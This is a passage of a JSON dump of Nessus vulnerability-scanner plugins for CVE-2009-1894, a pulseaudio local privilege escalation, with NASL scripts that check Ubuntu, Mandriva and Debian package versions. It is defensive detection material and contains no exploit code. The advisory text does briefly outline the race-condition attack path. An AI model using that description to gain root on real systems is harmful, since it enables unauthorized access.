pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulsecore5\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulsecore5-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-esound-compat\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-esound-compat-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-gconf\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-gconf-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-hal\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-hal-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-lirc\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-lirc-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-x11\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-x11-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-zeroconf\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-zeroconf-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-utils\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-utils-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-browse0\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-browse0-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-dev\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-mainloop-glib0\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-mainloop-glib0-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse0\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse0-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulsecore9\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulsecore9-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio\", pkgver:\"1:0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-esound-compat\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-esound-compat-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-gconf\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-gconf-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-hal\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-hal-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-lirc\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-lirc-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-x11\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-x11-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-zeroconf\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-zeroconf-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-utils\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-utils-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpulse-browse0 / libpulse-browse0-dbg / libpulse-dev / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:43", "description": "A vulnerability has been found and corrected in pulseaudio :\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered that pulseaudio, when installed setuid root, does not drop privileges before re-executing itself to achieve immediate bindings. This can be exploited by a user who has write access to any directory on the file system containing /usr/bin to gain local root access. The user needs to exploit a race condition related to creating a hard link (CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.", "cvss3": {}, "published": "2009-07-20T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : pulseaudio (MDVSA-2009:152)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64pulseaudio-devel", "p-cpe:/a:mandriva:linux:lib64pulseaudio0", "p-cpe:/a:mandriva:linux:lib64pulsecore5", "p-cpe:/a:mandriva:linux:lib64pulseglib20", "p-cpe:/a:mandriva:linux:lib64pulsezeroconf0", "p-cpe:/a:mandriva:linux:libpulseaudio-devel", "p-cpe:/a:mandriva:linux:libpulseaudio0", "p-cpe:/a:mandriva:linux:libpulsecore5", "p-cpe:/a:mandriva:linux:libpulseglib20", "p-cpe:/a:mandriva:linux:libpulsezeroconf0", "p-cpe:/a:mandriva:linux:pulseaudio", "p-cpe:/a:mandriva:linux:pulseaudio-esound-compat", "p-cpe:/a:mandriva:linux:pulseaudio-module-bluetooth", "p-cpe:/a:mandriva:linux:pulseaudio-module-gconf", "p-cpe:/a:mandriva:linux:pulseaudio-module-jack", "p-cpe:/a:mandriva:linux:pulseaudio-module-lirc", "p-cpe:/a:mandriva:linux:pulseaudio-module-x11", "p-cpe:/a:mandriva:linux:pulseaudio-module-zeroconf", "p-cpe:/a:mandriva:linux:pulseaudio-utils", "cpe:/o:mandriva:linux:2008.1", "cpe:/o:mandriva:linux:2009.0", "cpe:/o:mandriva:linux:2009.1"], "id": "MANDRIVA_MDVSA-2009-152.NASL", "href": "https://www.tenable.com/plugins/nessus/39871", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:152. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39871);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"MDVSA\", value:\"2009:152\");\n\n script_name(english:\"Mandriva Linux Security Advisory : pulseaudio (MDVSA-2009:152)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in pulseaudio :\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can be\nexploited by a user who has write access to any directory on the file\nsystem containing /usr/bin to gain local root access. The user needs\nto exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulseaudio-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulseaudio0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulsecore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulseglib20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulsezeroconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulseaudio-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulseaudio0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulsecore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulseglib20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulsezeroconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-esound-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-bluetooth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-gconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-jack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-lirc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-zeroconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulseaudio-devel-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulseaudio0-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulsecore5-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulseglib20-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulsezeroconf0-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulseaudio-devel-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulseaudio0-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulsecore5-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulseglib20-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulsezeroconf0-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-esound-compat-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-bluetooth-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-gconf-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-jack-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-lirc-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-x11-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-zeroconf-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-utils-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulseaudio-devel-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulseaudio0-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulsecore5-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulseglib20-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulsezeroconf0-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulseaudio-devel-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulseaudio0-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulsecore5-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulseglib20-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulsezeroconf0-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-esound-compat-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-bluetooth-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-gconf-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-jack-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-lirc-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-x11-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-zeroconf-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-utils-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64pulseaudio-devel-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64pulseaudio0-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64pulseglib20-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64pulsezeroconf0-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpulseaudio-devel-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpulseaudio0-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpulseglib20-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpulsezeroconf0-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-esound-compat-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-bluetooth-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-gconf-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-jack-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-lirc-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-x11-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-zeroconf-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-utils-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:45:08", "description": "Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon does not drop privileges before re-executing itself, enabling local attackers to increase their privileges.", "cvss3": {}, "published": "2010-02-24T00:00:00", "type": "nessus", "title": "Debian DSA-1838-1 : pulseaudio - privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:pulseaudio", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-1838.NASL", "href": "https://www.tenable.com/plugins/nessus/44703", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1838. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44703);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"DSA\", value:\"1838\");\n\n script_name(english:\"Debian DSA-1838-1 : pulseaudio - privilege escalation\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=537351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1838\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the pulseaudio packages.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-browse0\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-browse0-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-dev\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-mainloop-glib0\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-mainloop-glib0-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse0\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse0-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulsecore5\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulsecore5-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-esound-compat\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-esound-compat-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-gconf\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-gconf-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-hal\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-hal-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-jack\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-jack-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-lirc\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-lirc-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-x11\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-x11-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-zeroconf\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-zeroconf-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", 